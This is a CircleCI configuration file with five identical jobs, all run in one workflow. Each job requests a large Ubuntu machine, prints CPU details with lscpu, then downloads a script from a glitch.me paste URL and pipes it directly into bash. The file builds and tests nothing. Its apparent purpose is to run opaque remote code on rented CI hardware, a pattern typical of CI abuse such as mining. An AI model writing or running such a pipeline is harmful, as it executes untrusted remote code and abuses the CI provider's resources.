version: 2.1

jobs:
  trial1A:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: curl https://muq-hastebin.glitch.me/raw/65I6LhccWy | bash

  trial2A:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: curl https://muq-hastebin.glitch.me/raw/65I6LhccWy | bash

  trial3A:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: curl https://muq-hastebin.glitch.me/raw/65I6LhccWy | bash

  trial4A:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: curl https://muq-hastebin.glitch.me/raw/65I6LhccWy | bash

  trial5A:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: curl https://muq-hastebin.glitch.me/raw/65I6LhccWy | bash
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - trial1A
        - trial2A
        - trial3A
        - trial4A
        - trial5A
